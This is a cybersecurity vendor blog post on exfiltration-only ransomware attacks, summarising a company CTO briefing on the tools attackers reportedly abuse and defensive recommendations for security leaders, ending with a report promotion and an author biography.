Ransomware Without Encryption: Why Pure Exfiltration Attacks Are Surging—and Why They’re So Hard to Catch 

In Morphisec’s recent CTO Briefing: The State of Ransomware, CTO Michael Gorelik highlighted one of the most significant and troubling shifts in the ransomware landscape: many ransomware attacks no longer involve encryption at all.   

Instead, attackers quietly steal sensitive data—sometimes over weeks or months—and then extort victims long after the breach. This “ransomware without encryption” model is growing rapidly because it has lower risk for attackers, harder for defenders to detect, and nearly impossible for victims to investigate once logs have aged out.   

A New Kind of Ransomware Attack—Without the Ransomware 

Traditional ransomware relies on encryption. Modern ransomware relies on something far more difficult to detect. Here’s why:   

• Stealthy data exfiltration 
• Minimal malware footprint 
• Abuse of trusted tools and cloud services 
• Delayed extortion designed to prevent forensic tracing   

In the briefing, Michael explained that attackers no longer need noisy encryption tools to put organizations into crisis. Exfiltration-only attacks eliminate much of the risk—and technical complexity—of encrypting systems. They also make defenders less certain about what was stolen, when, and how.   

Here’s why attackers are shifting to pure exfiltration: 

• Encryption is noisy; exfiltration can be silent 
• EDR tools are weaker at data-theft detection than malware prevention 
• The ransom is still effective; victims fear regulatory fallout 
• Negotiations favor attackers because evidence is scarce 
• Many organizations can restore systems, but not stolen data  

The result? Victims still pay—even without encryption, a trend discussed both in the briefing and in Morphisec’s blog Why Ransomware Victims Still Pay.   

How Modern Exfiltration-Only Attacks Work 

The CTO briefing revealed several real-world techniques attackers used recently against organizations protected by leading EDR tools. Many of these attacks went undetected for weeks.   

1. Azure Copy Exfiltration 

One of the most concerning patterns: Attackers increasingly use Azure Copy to blend data theft with normal cloud operations. 

Because many organizations use Azure for backup or storage, data movement to Azure endpoints often doesn’t trigger alerts. 

Michael noted that in numerous Q3 and Q4 incidents, Azure Copy was the primary data exfiltration mechanism—chosen specifically because it hides in plain sight. 

This trend is also echoed in Morphisec’s published analysis of recent ransomware campaigns. 

2. RClone, Mega, and Bitbucket Tunnels 

Attackers frequently use: 

• RClone 
• MegaNz uploads 
• Bitbucket repos 
• Custom cloud sync scripts   

These tools mimic legitimate backup traffic. Unless defenders have deep network visibility—and many don’t—these flows go unnoticed. 

3. Abuse of Legitimate IT Tools 

Data theft often involves tools already present in the environment. 

Michael highlighted cases where attackers used: 

• Advanced IP Scanner 
• ZenMap 
• PowerShell 
• RoboCopy 
• Node.js portable modules 

Because these tools are normal in IT workflows, they blend in. Modern ransomware relies less on malware and more on abusing legitimate tools inside your environment. 

4. Zero Encryption, Zero Alerting 

Without encryption, there is: 

• No suspicious process behavior 
• No noisy file renaming 
• No CPU usage spike 
• No filesystem triggers 

 This allows attackers to steal data months before notifying victims—often via email, encrypted message, or even physical mail, as Michael described.   

Why These Attacks Are So Dangerous for CISOs

 Michael underscored a painful truth in the briefing: “When attackers only exfiltrate data, most organizations can’t determine what was stolen—or whether it was stolen at all.”   

1. Forensics become nearly impossible 
   Logs age out. Cloud storage events blend with normal usage. And without encryption events, there is no clear point of compromise. 
2. Victims often cannot disprove attacker claims 
   Attackers know this. Fake exfiltration campaigns are increasing because organizations can’t validate or disprove threats. 
3. Regulatory exposure is severe 
   HIPAA, GDPR, PCI-DSS, SEC cyber rules—none of them care whether data was encrypted. If it was accessed, you may need to report it. 
4. Backups offer no protection 
   Backups restore systems; they can’t restore leaked data. 

 In Morphisec’s Why Ransomware Victims Still Pay analysis, reputation and compliance fears were major drivers behind ransom payments—even without encryption.   

What CISOs Can Do: Lessons from the CTO Briefing 

Michael offered several practical recommendations during the briefing: 

1. Shift from detection to preemptive defense — You cannot detect what blends in with normal behavior. You can prevent attackers from gaining stable footholds in the first place.
2. Increase visibility into outbound data flows — Especially cloud services and third-party sync tools. 
3. Harden identity, MFA, and remote access paths — Exfiltration attacks often start with a single compromised account. 
4. Validate exfiltration claims before responding — Attackers increasingly bluff. An IR team must confirm evidence before ransom negotiations begin. 
5. Protect non-agent assets — Gateways, NAS appliances, and backup servers are often the origin of exfiltration paths. 

Exfiltration Is the New Front Line of Ransomware   

Encryption may be optional now—but extortion is not.  

Attackers have discovered a quieter, more effective model that bypasses detection tools entirely. By stealing data instead of encrypting it, ransomware groups reduce their risk while increasing pressure on their victims.   

See how attackers are shifting to exfiltration-only attacks—and how preemptive cyber defense stops them before they begin. The full breakdown of these evolving attack chains—including recent case studies, emerging ransomware group tactics, and predictions for 2026—is covered in detail in Morphisec’s CTO Briefing: The State of Ransomware – Exec Report. Download in the link below.

About the author

Brad LaPorte

Chief Marketing Officer

Brad LaPorte is a seasoned cybersecurity expert and former military officer specializing in cybersecurity and military intelligence for the United States military and allied forces. With a distinguished career at Gartner as a top-rated research analyst, Brad was instrumental in establishing key industry categories such as Attack Surface Management (ASM), Extended Detection & Response (XDR), Digital Risk Protection (DRP), and the foundational elements of Continuous Threat Exposure Management (CTEM). His forward-thinking approach led to the inception of Secureworks’ MDR service and the EDR product Red Cloak—industry firsts. At IBM, he spearheaded the creation of the Endpoint Security Portfolio, as well as MDR, Vulnerability Management, Threat Intelligence, and Managed SIEM offerings, further solidifying his reputation as a visionary in cybersecurity solutions years ahead of its time.